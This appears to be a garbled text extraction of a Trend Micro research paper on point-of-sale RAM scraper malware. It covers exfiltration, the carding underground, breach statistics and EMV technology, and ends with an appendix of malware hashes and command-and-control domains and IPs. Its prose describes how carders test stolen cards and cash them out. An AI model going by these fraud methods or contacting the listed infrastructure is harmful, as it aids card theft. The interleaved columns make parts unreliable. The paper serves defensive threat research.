Tor circuit
RDP/Backdoor
Manual removal
Figure 41: Data-exfiltration techniques observed among PoS RAM scrapers
58
Trend Micro | PoS RAM Scraper Malware
The following were also noted: PAN’s final digit is a check digit calculated
using the Luhn algorithm. This is designed
• Cybercriminals register fake domains to catch errors in the PAN’s previous digits.
for data-exfiltration purposes with All valid credit card numbers must pass Luhn
hosting providers in countries with validation.
lax Internet law enforcement such as
Russia and Romania, among others. PoS RAM scrapers generally use regex
These fake domains act like man-in- matches to search for and harvest
the-middle (MitM) data collectors. Tracks 1 and 2 credit card data from the
process memory in the RAM. Depending on
• The Tor network conceals C&C the complexity of the regex, it may incorrectly
servers’ IP addresses and, by default, capture garbage data from the RAM in
encrypts all traffic. The C&C servers’ addition to valid card data. Well-defined
addresses end with a .onion pseudo- regexes return clean results but may be more
TLD, which cannot be resolved computationally expensive compared with
outside the Tor network and can looser ones. If the cybercriminals’ goal is to
only be accessed using a Tor proxy quickly capture data from the RAM, efficiency
application. ChewBacca makes use of is deemed more important than information
this functionality. quality.
Data Validation
59
Trend Micro | PoS RAM Scraper Malware
A home-brewed tool for validating Track 2 Cybercriminals need to check and validate
credit card data using the Luhn algorithm was credit card data prior to selling it in
also discovered inside a PoS RAM scraper underground carder marketplaces because
distribution package. A second tool or script selling bad information will damage their
most likely sorts the validated credit card reputation. Repeat offenses can also put their
data by issuer based on publicly available IIN personal security at risk.
information.
TSPY_POCARDL.AI
29ff4be5d8a595b5812fa84574f7c2785616f72b
SPYW_CCVIEW
54e35c98fd8bee2902f9138552706f1ba7702146 TROJ_DECBAL.A
Who Are Behind PoS Attacks? Forums are very welcoming to new members
(i.e., newbies) and even provide extensive
support to help newbies get up to speed in
Hackers infiltrate companies and steal carding. The idea behind this is simple—the
Tracks 1 and 2 credit card data from PoS more dumps sold, the more money hackers
systems using RAM scrapers. They then make. Selling dumps is not like selling
sell the stolen credit card data in batches drugs that are limited in quantity. Hackers
called “dumps” to carders in carding forums. tend to sell the same dumps to multiple
Buying and selling dumps is called “carding.” carders because verifying duplicate sales is
Carders are the consumers of stolen card difficult. Hackers also provide replacement
data, which they then monetize. Carding guarantees if cards stop working within an
forums sell both skimmed and scraped card agreed x number of hours after purchase.
data. We have not found price variances
between the two types of data although the
consensus in some carding forums seems to
be that data obtained via skimming is better.
60
Trend Micro | PoS RAM Scraper Malware
Stolen Card Data for Sale and demand as well as how much money
carders can potentially steal from stolen
cards before banks block or deactivate them.
Carding forums sell all kinds of card data to Our recent visit to the Russian underground
anyone who is willing to pay. Transactions shows that the prices of stolen credit card
are completed using Bitcoins, Western data have been declining over the years.
Union, MoneyGram, Ukash, and WebMoney, [60] Price variations, depending on card
among others, as these offer convenience brand, still exist. The following table shows
and anonymity to both buyers and sellers. representative prices of validated U.S.-based
credit cards in various carding forums.
Different card brands fetch varying prices
in carding forums, depending on supply
61
Trend Micro | PoS RAM Scraper Malware
Two key takeaways were obtained from are harder to come by compared with Visa
investigating credit card prices. First, buying or MasterCard cards, make them more
credit card data in bulk reduces unit prices, expensive.
in some cases, by up to 66%. Second, the
unit prices of Discover and AMEX cards Using Stolen Credit Cards
are higher than of those issued by Visa and
MasterCard. AMEX and Discover cards cost
The first principle in any carding forum is that
more because they have lower charge-back
one needs to spend money to make money.
volumes compared with Visa and MasterCard
Carders invest in dumps with the expectation
cards, which have lots of charge-backs
of quick return on investment (ROI). Active
and are thus subject to greater scrutiny.
discussions were seen on carding forums
The forums also claim that most merchants
on how much money carders can actually
do not properly verify AMEX and Discover
steal using stolen credit cards before banks
cards for large-sum transactions. Beliefs
block or deactivate them. The following table
and speculations such as these, combined
compiles amount ranges that carders claimed
with the fact that AMEX and Discover cards
they were able to steal.
62
Trend Micro | PoS RAM Scraper Malware
Discover US$1,000‒5,000/card
Looking at the ranges in the table above, it errors that happen would not raise
is obvious that if carders get lucky, they can immediate suspicion. Carders do
cause substantial financial damage to banks not need to create authentic-looking
and card owners. The lure of big payoffs counterfeit cards, again due to the
continues to fuel a thriving underground nonpresence of attendants to verify
carding marketplace. their authenticity. The downside of this
type of cash-out method is that ATMs
After purchasing dumps from hackers, have a daily withdrawal limit and
carders check if the credit card numbers are vending kiosks inside shopping malls
still active before attempting to use them. only sell low-priced goods.
Some of the techniques they use include but
are not limited to the following: • Use for online purchases: This is,
by far, the most popular cash-out
• Sign up to pornographic websites, method. Carders tend to target poorly
which require a valid credit card for designed e-commerce websites and
age-verification purposes order goods from there. The wisdom
in carding forums is that a poorly
• Make small online donations to designed e-commerce website is a
charitable organizations to see if good indication of poor management
transactions are approved and so they may be easier to
complete fraudulent transactions with.
• Find online merchants who can verify Carders also frequent e-commerce
credit card limits without charging the websites that do not require the
cards (Note that these merchants are CVV2 number for card-not-present
extremely rare and their contacts or transactions. Once purchased, they
links are not publicly shared.) have the goods shipped to dump
locations (e.g., a foreign address, an
The most popular methods used to empty house, etc.). Goods purchased
successfully cash out on stolen credit cards with stolen cards are then sold
include the following: on auction sites such as eBay for
reduced prices. The income earned
• Use in ATMs, vending machines,
from selling such goods is converted
and gas pumps: Carders create
to cash and stashed away or can be
simple fake cards and use them at
used to purchase anonymous virtual
vending machines to purchase goods
currencies such as Bitcoins.
or at gas pumps to purchase fuel or if
they have the cards’ PINs, use them • Use for in-store purchases: This is
at ATMs to withdraw cash. ATMs, the riskiest cash-out method. Carders
vending machines, and gas pumps use counterfeit credit cards to make
are meant to self-serve and thus in-store purchases. Organized gangs
require no attendants. So, transaction who have access to expensive card-
63
Trend Micro | PoS RAM Scraper Malware
64
Trend Micro | PoS RAM Scraper Malware
It is not surprising that the largest volume Similar to Verizon’s findings, Trend Micro
of detections was seen in the United States Smart Protection Network data revealed that
because the country’s economy is heavily most PoS attacks target companies in the
geared toward purchasing goods and retail industry. This industry, after all, has a
services using credit cards. Consumers very high volume of credit card transactions,
in other countries still tend to use cash or making it a lucrative target for harvesting
debit cards more than credit cards. The card data. Compromising a single PoS
high volume of credit card transactions that system usually yields data for thousands of
companies process in the United States credit cards and is a preferred alternative to
makes it a lucrative target for PoS RAM infecting thousands of victims’ systems in
scrapers. hopes of stealing card data from them.
65
Trend Micro | PoS RAM Scraper Malware
Retail 67.51%
Food and beverage 2.31%
Technology 0.84%
Manufacturing 0.84%
Utilities 0.63%
Healthcare 0.42%
Real estate 0.42%
Others 27.03%
Credit Card Data Breaches in the publicly disclosed data on security breach
incidents in the United States, including those
United States that involve credit cards. The organization
compiles this list from various sources (e.g.,
The number of credit card data breach media, Attorney-Generals’ offices, privacy
incidents has been steadily rising in the websites, etc.). We mined data from this list
past couple of years. Privacy Rights to look for information on credit card data
Clearinghouse—a California-based nonprofit breaches from 2005 to the present date.
corporation—publishes the “Chronology of The data we collected supports many of the
Data Security Breaches—Security Breaches observations and claims previously made in
2005‒Present.” This is a collection of all this paper.
100
87
50
0
2005 2006 2007 2008 2009 2010 2011 2012 2013 2014
Figure 48: Publicly disclosed credit card data breach incidents from 2005 to 2014
66
Trend Micro | PoS RAM Scraper Malware
The concept of PoS RAM scraping was first breaches and defines the categories as
introduced at the end of 2008 or in early follows:
2009. As shown in the previous figure, the
number of publicly disclosed credit card data • BSO: Business — others
breach incidents significantly increased in
2010. The high number of incidents remained • BSF: Business — financial and
steady since then and peaked in 2011. (Note insurance services
that the 2014 data remains incomplete.)
This rise can be partially attributed to the • BSR: Business — retailers and
development of new credit-card-data-stealing merchants
malware that incorporate proven methods
to bypass or exploit bugs in PCI DSS • EDU: Educational institutions
requirements. The data trend clearly shows
• GOV: Government and military
that the business of credit card data theft is
well established and is not showing signs of
• MED: Healthcare — medical
slowing down in the near future.
providers
The Privacy Rights Clearinghouse data
• NGO: Nonprofit organizations
provides a breakdown of the different
industries that reported credit card data
BSR 46.99%
BSO 22.41%
BSF 9.64%
MED 8.92%
EDU 5.54%
GOV 3.37%
NGO 3.13%
Figure 49: Publicly disclosed data on the types of organization that have suffered credit card data
breaches
As shown above, the industry distribution The Privacy Rights Clearinghouse also
closely matches data from the Trend Micro provides a breakdown of the breach methods
Smart Protection Network and Verizon. Most employed in credit card data breaches. The
of the attacks target retailers and merchants, breach methods are as follows:
as companies in the retail industry process
a huge volume of credit card transactions. • Unintended disclosure (DISC):
Successfully compromising the networks of Sensitive information posted publicly
big retailers or merchants yields thousands of on a website, mishandled, or sent to
credit card credentials in a very short period the wrong party via email, fax, or mail.
of time, making them lucrative targets.
67
Trend Micro | PoS RAM Scraper Malware
HACK 52.29%
INSD 16.39%
PORT 7.71%
CARD 6.51%
PHYS 5.78%
DISC 5.30%
STAT 2.65%
UNKN 3.37%
Figure 50: Publicly disclosed data on methods used in credit card data breaches
It is not surprising that hacking and malware modifications in order to adjust to changing
attacks comprise the bulk of breach methods conditions.
discovered across incidents. Hacking or
malware attacks succeed because they The following table lists the largest publicly
provide cybercriminals a certain degree disclosed credit card data breach incidents
of anonymity, convenience (i.e., remote in the United States from 2005 to the present
deployment), and flexibility to make quick day.
68
Trend Micro | PoS RAM Scraper Malware
Note that the table above only includes of Tracks 1 and 2 credit card data
incidents wherein more than 10 million credit required to duplicate cards but
card records were stolen because those they store enough information for
incidents made headlines. Looking at the cybercriminals to use in committing
data above, we see a pattern emerge—a card-not-present transaction fraud.
massive credit card data breach incident
occurs every two years. • Steal encrypted databases: PCI
DSS requires credit card data at rest
Other Credit Card Data Theft to be encrypted. The Privacy Rights
Clearinghouse data has reports of
Methods several breach incidents wherein
encrypted credit card databases were
Credit card data theft has been occurring stolen. Hackers may have retrieved
long before the concept of RAM scraping or recovered the decryption keys
was first introduced. PoS RAM scraping is from other systems, applications, or
a convenient way to steal large volumes of RAM and can decrypt the stored data
unencrypted credit card data, making it a offline.
popular attack vector among hackers. Other
data theft methods include the following: • Target non-PCI-DSS-certified
merchants: Retailers and merchants
• Attack e-commerce websites: A are not the only ones that process
large percentage of daily credit card credit card transactions. All sorts of
transactions occur on e-commerce companies (e.g., medical clinics,
websites. Hackers use a variety insurance brokers, rental offices,
of breach vectors to attack poorly notary publics, etc.) accept credit
protected or configured e-commerce card payments as well. Some of them
websites (e.g., via SQL injection, may not be PCI DSS certified and
vulnerability exploitation, etc.). Once may store credit card data, along with
the websites are compromised, other customer records, unencrypted
hackers can access encrypted or in their systems.
unencrypted credit card databases
and steal data. E-commerce websites • Sniff networks: PCI DSS requires
do not have access to entire sets credit card data in transit to be
69
Trend Micro | PoS RAM Scraper Malware
encrypted when transferred over data is under constant threat unless strong
the Internet. No such encryption protection measures are employed.
requirements exist for credit card
data transferred over LANs or WANs. New Credit Card Technologies
If hackers manage to breach the
networks of companies that process
New technologies are being introduced in
credit card transactions, they can
the North American market to help curb or
sniff LAN or WAN traffic and can
prevent credit card fraud as well as to make
match patterns in order to retrieve
transactions more convenient and secure.
credit card data. This is a passive and
We will focus on two technologies that are
stealthier strategy compared with PoS
now being implemented in many countries—
RAM scraping.
EMV chips and contactless radio frequency
• Exploit vulnerable PoS software: identification (RFID).
PoS software have vulnerabilities
even though we have not seen EMV
them publicly disclosed. Hackers
may discover vulnerabilities in PoS EMV or chip-and-PIN credit cards are now
software and may exploit them in widely used in Canada and Mexico. The
order to gain remote access to the United States is scheduled to switch to EMV
process memory space in the RAM to credit cards by October 2015. [63] EMV
steal credit card data. cards are also being widely used in South
American, European, and Asian countries.
• Exploit APIs and proprietary
protocols: The different parties
involved in the credit card transaction
flow model use proprietary protocols
and public or private APIs for
communication. Hackers may
discover flaws or vulnerabilities in
these protocols or APIs and exploit
them in order to gain access to credit
card transaction data.
70
Trend Micro | PoS RAM Scraper Malware
After the Target data breach in sent to the PoS system for processing, it will
December 2013, EMV credit cards have become susceptible to PoS RAM scraper
been the focus of much discussion, as attacks because the decrypted data resides
many see it as the solution to prevent future in the RAM.
credit card data breaches. The reality is,
EMV credit cards cannot prevent PoS RAM U.K. credit card fraud statistics show that
scraper attacks. [64], [65] As previously even after EMV cards were introduced in the
mentioned, EMV cards store encrypted country, losses related to card-not-present
Tracks 1 and 2 credit card data on the chip. fraud dramatically increased in number. [66]
This chip makes it extremely difficult for This shows that cybercriminals are using
cybercriminals to manufacture counterfeit stolen credit card data for online purchases
credit cards using stolen data, which helps instead of manufacturing and using
reduce counterfeiting and lost or stolen card counterfeit cards.
fraud. If the EMV Tracks 1 and 2 data is
300
Chip and PIN
deployment
Card not present
period
Counterfeit
Losses in (£m)
Check fraud
ID theft
Online banking
0
2004 2005 2006 2007 2008
71
Trend Micro | PoS RAM Scraper Malware
payment transactions. Each card brand stored in contactless cards. There are open
instead defines its own proprietary protocol source software libraries for reading and
based on EMV principles. This means that a extracting data from contactless cards, which
MasterCard PayPass reader cannot process can be used to build custom NFC apps.
transactions for Visa payWave cards. [67] Armed with an NFC-enabled smartphone
With the growing popularity of contactless and an app that can read contactless card
payment cards, however, hybrid card readers data via NFC, hackers can brush against
have now been developed. potential victims in crowded public spaces
and wirelessly steal their credit card data
Contactless payment cards all use the in an act that has been dubbed “electronic
same communication protocol—EMV pickpocketing.” The simple solution to
Contactless Communication Protocol prevent electronic pickpocketing is to put
Specifications—for communication with near- contactless cards in shielded sleeves that will
field-communication (NFC)-enabled devices. block the electromagnetic energy required to
Many smartphones today are NFC enabled power the RFID chip on them.
and have apps that can read all of the data
72
Trend Micro | PoS RAM Scraper Malware
73
Trend Micro | PoS RAM Scraper Malware
74
Trend Micro | PoS RAM Scraper Malware
• Trend Micro Deep Discovery can New credit card technologies are being
detect the download of malware and introduced in the North American market to
RATs without antivirus signatures. [70] help curb or prevent credit card fraud as well
as to make transactions more convenient
• Deep Discovery can detect certain and secure. Though these technologies
lateral movements and the spread of will help reduce counterfeiting and lost or
malware. stolen credit card fraud, they cannot prevent
PoS RAM scraper attacks. On the flip side,
• Deep Discovery can detect C&C they will introduce new attack vectors that
communication, both inbound and cybercriminals can exploit to steal credit card
outbound. data.
• Deep Discovery can detect Bob Russo’s Statement for the Record is
both external and internal C&C accurate, “Our work is broad for a simple
communication. reason: there is no single answer to securing
payment card data. No one technology is a
• Deep Discovery can detect internal panacea; security requires a multilayered
data movement. approach across the payment chain.” [64]
75
Trend Micro | PoS RAM Scraper Malware
APPENDIX
121d097c4cc6cabd5989675e9ec01981b921f381 fra.ishareda.com
fe98267b11389841a5197a5fc8a0b2ad2dceed0c 666andro.net
stylishkattyrock.com
4e682b34c3e122e55d21f9a501b9f13afb7437a9 BKDR_ALINA.KER
redsylockyboons.com
208.98.63.228
someligeoas.com
zwaonoiy.com
193.169.87.147
jikobins.com
183bdebb8872f12f5379b8d40030059513317361 ioconzus.com
204.188.242.201 BKDR_ALINA.NG
ioconzus.com
38540d09a90a60afdc7d5039cf37c453e4055ee2
jikobins.com
76
Trend Micro | PoS RAM Scraper Malware
stylishkattyrock.com
10a4cfc9dedff9d254b73c32b696299d26b19ca7 BKDR_ALINA.NH
redsylockyboons.com
tyrnslqoa.biz
ea8f102be4ea3a641e7970c18d026917f68212c6 BKDR_ALINA.OB
208.98.63.226/goose/
push.php
ioconzus.com
204.188.242.201
208.98.63.226/goose/
9107d1b360ff8e50141661729503ec1907529498 BKDR_ALINA.OE
push.php
208.98.63.226/goose/
fc5255f94762392f7a4e0269c8857750e1e7be93 BKDR_ALINA.OF
push.php
ioconzus.com
204.188.242.201
77
Trend Micro | PoS RAM Scraper Malware
84.22.106.87/
13ef5f8e812a692c0893ad935b48b3f1a4aec615 BKDR_ALINA.OM
asdwer/1.php
host3.com
204.188.242.201
1b3dcfeda9d01dc428d954812c81f7bda1af5373
193.107.17.126 BKDR_DEXTR.A
6c090aa226a719d8d948ad5244252b8b0c5e0af2
37.0.122.142/alfa/
1aa7185a16ca692488c76204bec5eabce3c07b5e
gateway.php
62.76.44.111/fk/
5d46b487372ccd6939da7aa4c68b75d0740501ed
gateway.php
151.248.115.107/
ial9121988921973dsa
dde7cfcc196df7107a5ca31ac4ea120b667dd861
das8dsa080dsa/
gateway.php BKDR_DEXTR.C
62.76.44.111/fk/
df963c2ef9544c2b49488a67bf9efe841af53f0f
gateway.php
backup-service.in.ua/
alfa/gateway.php
57416ce29c9b3c5f01bbbc599007da4734f733bc
37.0.122.142/alfa/
gateway.php
89.45.14.69/a/gateway.
ab96ff2df5092eb36082e948f1524ec339de8965 BKDR_DEXTR.D
php
78
Trend Micro | PoS RAM Scraper Malware
89.45.14.69/a/gateway.
047fef6f231e25fe46147e173a2ecf677aaa4898
php
188.240.34.210/
0f9979c65e72ea07bef715eb3c549c5ca1b50f16 outpost/exes/sysproc.
exe
0fa6eb784c3a8a5ae65dba50f8da878dceecf467
198.23.129.146/panel/
gateway.php
14b7ba38d0dc8b6009217b5a4a15cd7d49a3a2c4
17e0cfaeb3f89814310f423b2605e6f80df18557
46.19.143.252/w3e4/
gateway.php
246d1d33e72d7e5e5b27da7c2cf8e912e577641e
33c16196ec7a2f0029a0506955eaf14b22cbdffe 64.90.187.223
BKDR_DEXTR.SMM
46.19.143.252/w3e4/
3a2c85304e208cc3be0fc887c7f18b4f89a527ef
gateway.php
62.76.44.111/fk/
3e2c3966d856331c184b810fd32b7dfc8e5080df
gateway.php
3fa9fc69c1f78b87ed3a2975f87056735c921e73 64.90.187.223
499458fe40103ef993b05cb1cced3bdbffd71428 46.19.143.252
4e7f1ff74fb8e6b82bd07c55522d4f5a9f5a5249 byroec2.com
55ded557a7efa1de0644ba6cdae5879816e365a7 houseofcarders.com
5999736d0c5a203aeb242689250a27396f39e996 5.199.165.24
5dc93a9ef1f2611a6d9967c697fa8680300878a0 www . g45d . net
79
Trend Micro | PoS RAM Scraper Malware
6e88d96a56bb35fa465a3a92b6cf7ffac69a12b4 666.andro.net
6eb299b368d94fb6f340d40d0c284830f22f4664
7b9ccd34334ad2d9c728122162f399d8313f9e89
houseofcarders.com
99aa3b75d8c9744e46ba4fe301a890a636eb4ad7
a21219db5b9c43e9ed0b475c1df1c1e414413443
109.163.229.57/w3e4/
87c120dccbc9e7c7d0f0c5e6e6e5eb692da97422
gateway.php
89.45.14.69/a/gateway.
8e03f0f6d9ac7640c179c40844ce3718c3884278
php
a5da1c138c7cf738e5072d23aadffa103f57c9cb 78.108.93.135
62.149.24.147/dexter/
ace7e975bb54117a906c07161883a51f14a701cb
gateway.php
89.45.14.69/a/gateway.
affd76583196c8dace21aab4076a1fd0e3ec177c
php
b870a82781aa0dbdb0c2fcedea5ee58f01321885
c8745571b2933ea1c56e5dc069d5449875990dcf 46.19.143.252
858d9b29ac3b808b754dc17fea48b6a26dc854b4
c05381ccab1b49f11b0898d0ea64fb2df8b6f2cb casinoloader.com
e568d933209b721ac6a8ec4837a603bd80633fa5 macar.na.tl
f325e26c82eb68a05af93890c13a246202ea658b houseofcarders.com
80
Trend Micro | PoS RAM Scraper Malware
f87ad687168d7d418b92a3d8019bb44ffe00cc03 37.221.171.104
www . y4j5 . com
0840392259f4cb23ae68bb420e57a4530d7fe0f8
backup-service.in.ua/
BKDR_DEXTR.SMM
alfa/gateway.php
141.255.165.145
a8bb7ce5e8616241a268666cd07926938dfbbe44
37.0.122.142
www .
663a22ba842a1cce519615296a88d66eb0035f88 BKDR_HESETOX.B
posterminalworld . la
7536f3f518825b4d66b5fa34bbb2782e5deb1038
www .
posterminalworld . la
8f1fbf88831e7b6c4186603cad0f0df89b1d0aee BKDR_HESETOX.CC
e1efc96c22a55933816e81bc7f9efa9339ac6a25 gmxdotkomlive.ru
00444b93a3f3b68058a5227ae57a91646ff8b3b5 ibenterprises.com.pk
12b780648ab830e473edb23a7b2edafbdf9e814a test.debian-bg.org
4bb9ddc057d94f3792da390fb97ce75569835f95 www . lolo . co . in
55f3a29e610fd1e0ffe0b36035807b7f29e4a7eb www . 3m21l . com
BKDR_HESETOX.
5631a8d02f2f29804bdd065544bcaf5938e1632c mx3.ringtonetrip.com SMJ
87ef9ed0f5c24c91bc6e8c4a601460f317c05e69 vsk.ignorelist.com
www .
8fdeb5e6e178f0c88ab0b48c0c14a7e3b691514d
posterminalworld . la
www . cam2cam47 .
92931192720392c70c0e9e99eaee2729b15013be
infosite . me
81
Trend Micro | PoS RAM Scraper Malware
c4aa7606137010ba9c3fc7433bc127275b7eb181 fasunshi.com
checkmeout.host-ed.
d56e22f190f8a5336cbd1160ca776ceae5e0588c
me
e134e8b327b93c5d25168c8dfbf0c3f8a9e9238a adobeupdater.ng
BKDR_HESETOX.
SMJ
ec1294c2625ad714032be065f811bd153bdd1992 5.199.164.240
www . ibenterprises .
com . pk
c1868c17c20d98df05be8dbd99bc1146a584842d
144.76.119.139
b85ea67877ecdd4f13f7822375d9af5f775e45e7 38robpl95.esy.es
BKDR_HESETOX.
www . SVD
f9e70830ca9b8859e8503112ba9a6a9af47ca6db
posterminalworld . la
0fdd3f4bcef35561dffc4eb50cefa6dc695560bd
62.76.44.111/fk/
BKDR_PCCLIENT.DX
gateway.php
f71971c5e9205f1a6b17f30b7e69975228ebbe16
www .
7e4538c27de7c24a439a82309d7241fb0d45249a BKDR_VSKIM.A
posterminalworld . tk
TROJ_BANLOAD.
f69d253bad4e4d2c90663c18b9f341ac2fd89145 141.255.160.58
KGD
TROJ_COMREROP.
6152afc75a669503083f21df23b636013f807c8f cl3an45u.biz
ST
026da25835816905926d645607f90195bbf6a398 imagick.biz
TROJ_DELF.XXBL
b4fcc660a22ec1005712787e2a5f1e691534baa2 222andro.net
82
Trend Micro | PoS RAM Scraper Malware
backup-service.in.ua/
663dc00b75b62ba32f662d3999a704d9044b368b
alfa/gateway.php
TROJ_DEXTER.CF
37.0.122.142/alfa/
663dc00b75b62ba32f662d3999a704d9044b368b
gateway.php
16ce3410a4295132590a0fd81bcf910c731c1b47 mcsup.cc
b3f86c635c74c18caecaaf9749344d17cd5a06c8 78.108.93.135
151.248.115.107/
ial9121988921973dsa
e8db5ad2b7ffede3e41b9c3adb24f3232d764931 TROJ_PINCAV.SY
das8dsa080dsa/
gateway.php
8e984227ce0c5ac85852ec18dbc4262d4cd63e16 109.234.159.254
TROJ_POSTOLI.A
8e984227ce0c5ac85852ec18dbc4262d4cd63e16 mcsup.cc
62.76.44.111/fk/
d082f85f265b5fffc39ab1120cd431b9c36a43cf TROJ_POXTERS.AD
gateway.php
3c93109b22c64acdfc3feba386aa19802481ccb5
houseofcarders.com TROJ_POXTERS.NIM
9740ee1ff36b00a0e5c4c34ddbdd6fc2e425c25b
rolex216.8s.nl/go/
0e7ee5116fbca7653d87fe19171612a6a0278be4 TROJ_SPNR.07FR13
go.php
83
Trend Micro | PoS RAM Scraper Malware
someligeoas.com
208.98.63.228
208.98.63.226/goose/
b9b6aea307491ca07deaded821838b86f2961f77 TROJ_SPNR.11CA13
push.php
redirection67.net78.
5160c089b463ea8c661e5667512edad8d4a331a7 TROJ_SPNR.15AF14
net/hm/gateway.php
208.98.63.226/goose/
805dc00b0687646b98971a0220e088658ae8deae TROJ_SPNR.15FE13
push.php
dailygiftclub.info
41626f258b898d80ef44fc9041835f438fbf4928 TROJ_SPNR.38B814
dailygiftclub1.info
serveftp.com/www.
f4cb0c9522b5bd1c2a1d1e68f0958e01826b0c85 TROJ_SPNR.38L213
paypal.com/
www . inf0nix . com /
d875ff7c1834bd28a40ae49e266df4aed29695c3 TSPY_BANKER.CC
notify . php
genporno.info
eb447af477eb480518283a30330ec39c8d5bd7bb TSPY_FAREIT.OP
67.215.65.132
2301208c5b75c036b0dcc7aad0fd95f6df3dc10d sopvps.hk
TSPY_JACKPOS.SM
59821dd4233c2901a7e60e72d417f9dce7357ee2 cl3an45u.biz
84
Trend Micro | PoS RAM Scraper Malware
ccfc0fa22d1e3feeeabc5ca090b76f58f67edada sopvps.hk
sopvps.hk:80/post/
91f1b7b6c7cf89786c770fe9fdc861c4e01d5d5b
echo
TSPY_JACKPOS.SM
dailygiftclub1.info
956128fcc8f8c12d0ffde76e173d69fd97fdcfe0
dailygiftclub.info
www . q1w2e3r4 . pro /
4a248539308bc04ac8d574e34bb984f47814b3a8 TSPY_POCARDL.AI
bot . php
tabz.org/Panel/post.
02dc617cfb5ee4449ba10a7ee9a86b3e2e8dff36
php
31dad731919e20c0cb3ce98efc01daea4ac34f21 109.75.176.63
TSPY_POCARDL.AK
www . krakau -
5c6235b78850b7e4c80606227af9c1f2a7c75f66 traktoren . com / panel /
post . php
266b481113db8a57ef63f7fca7ef0682e5c94f00 109.75.176.63
61627fde1b62ced55715e59bdbbbc13a24c11908 accsforall.net
TSPY_POCARDL.
DAM
c8078e219e82b41f0f841efd3e20462a795c6f5c 109.75.176.63
f5f087901529464c0014da1d22e6e1e3cf39d270 autos-mark.comlu.com
www . q1w2e3r4 . pro /
262e603e8a388743eac0ca241bc60703a8c465b8 TSPY_POCARDL.H
bot . php
ftp.sobachka.comze.
052b95a51a6cdbead362894cc41ce630714e3ae0
com
TSPY_POCARDL.SM
37c55eba1d13d73392a86e03b1e24def2d2d08ae ftp.onelove.16mb.com
85
Trend Micro | PoS RAM Scraper Malware
91a8791a0ec422fa951a84971e71a5a61b66cad0 ftp.onelove.16mb.com
448d43cb663505fe39cf348d84de7fd8763d2d58 ftp.c4a.16mb.com
TSPY_POCARDL.SM
ftp.sobachka.comze.
997e01901442de14aad9e999c02d6ab2a4cdeeb1
com
9b757df9a97f1b65be065da7d64948737925ec8b
ftp.krokodil.netai.net
b20d49115653946ae689d0d572fdfc483ea04cc5
ftp.sobachka.comze.
b253ddc656c0d99c2b34c9979251a912ade4dd92
com
fa696af7acbbdca78003eccb798f7afc3fa4c535 184.22.104.41
TSPY_POCARDL.SM
www . pidginshop . ws /
reports /
f2731e20841e63f728abfbe1c6ee506105e39317
184.22.104.41
184.22.104.41
2e5b1ad17423c4ff4ed45f10ab088db4ded90eb7
ree4.7ci.ru
19a7bcd9381075ed062fb2bb87ae64600afd0b7c www . inf0nix . com
TSPY_
POCARDLER.B
d72a0b8e7117f0c5e2ef0901bc58274ea41c9d3a inf0nix.com
7789b069f6eea55e305c4844ac442f6c0d0aa280 193.107.17.126
TSPY_ZBOT.DX
3634d3fdb93e6ae92ca47188efb320cf636763b8 193.107.17.126
BKDR_DEXTR.A
3634d3fdb93e6ae92ca47188efb320cf636763b8 193.107.17.126
BKDR_DEXTR.B
86
Trend Micro | PoS RAM Scraper Malware
mirandfg.info
9eb10078dff148ae6d95d3c00f98a1316bca1676 TSPY_ZBOT.SM15
1fresd.info
87
Trend Micro | PoS RAM Scraper Malware
REFERENCES
1. Brian Krebs. (October 10, 2013). Krebs on 9. CreditCards.com. (2013). “How a Credit Card
Security. “Nordstrom Finds Cash Register Is Processed.” Last accessed August 18,
Skimmers.” Last accessed August 22, 2014, http://www.creditcards.com/credit-card-
2014, http://krebsonsecurity.com/2013/10/ news/assets/HowACreditCardIsProcessed.
nordstrom-finds-cash-register-skimmers/. pdf.
2. Visa Inc. (2008). “Visa Data Security Alert: 10. Pravin Vazirani. (2014). Chetu. “Choosing
Debugging Software—Memory Parsing Between Payment Gateway & Payment
Vulnerability.” Last accessed August 18, 2014, Processor.” Last accessed August 18, 2014,
http://usa.visa.com/download/merchants/ http://www.chetu.com/blogs/finance-2/
debugging_software_memory.pdf. choosing-between-payment-gateway-and-
payment-processor-2/#sthash.zlwoHPVZ.
3. Wade H. Baker, C. David Hylender, and dpbs.
J. Andrew Valentine. (2009). “2009 Data
Breach Investigations Supplemental Report.” 11. ISO. (2014). “ISO/IEC 7813:2006: Information
Last accessed August 18, 2014, http://www. Technology—Identification Cards—Financial
verizonenterprise.com/resources/security/ Transaction Cards.” Last accessed August
reports/rp_2009-data-breach-investigations- 19, 2014, http://www.iso.org/iso/home/
supplemental-report_en_xg.pdf. store/catalogue_tc/catalogue_detail.
htm?csnumber=43317.
4. Verizon. (2014). “2014 Data Breach
Investigations Report.” Last accessed August 12. Wikimedia Foundation, Inc. (August 14,
18, 2014, http://www.verizonenterprise.com/ 2014). Wikipedia. “Magnetic Stripe Card.”
DBIR/2014/reports/rp_Verizon-DBIR-2014_ Last accessed August 19, 2014, http://
en_xg.pdf. en.wikipedia.org/wiki/Magnetic_stripe_card.
5. Gregory Wallace. (January 13, 2014). CNN 13. Numaan Huq. (May 28, 2014). TrendLabs
Money. “Target and Neiman Marcus Hacks: Security Intelligence Blog. “Scrape FAST,
The Latest.” Last accessed August 18, 2014, Find ’em Cards Easy!” Last accessed
http://money.cnn.com/2014/01/13/news/ August 19, 2014, http://blog.trendmicro.com/
target-neiman-marcus-hack/. trendlabs-security-intelligence/scrape-fast-
findem-cards-easy/.
6. US-CERT. (January 2, 2014). US-CERT.
“Alert (TA14-002A): Malware Targeting Point 14. Wikimedia Foundation, Inc. (August 19,
of Sale Systems.” Last accessed August 18, 2014). Wikipedia. “Bank Card Number.”
2014, https://www.us-cert.gov/ncas/alerts/ Last accessed August 19, 2014, http://
TA14-002A. en.wikipedia.org/wiki/Bank_card_number.
7. Visa Inc. (2014). “Card Acceptance 15. PCI ComplianceGuide.org. (2014). “PCI
Guidelines for Visa Merchants.” Last FAQs.” Last accessed August 19, 2014,
accessed August 18, 2014, http://usa.visa. https://www.pcicomplianceguide.org/pci-
com/download/merchants/card-acceptance- faqs-2/.
guidelines-for-visa-merchants.pdf.
16. IBM Knowledge Center. “Requirement 1:
8. Slava Gomzin. (February 2014). Hacking Install and Maintain a Firewall Configuration
Point of Sale: Payment Application Secrets, to Protect Cardholder Data.” Last accessed
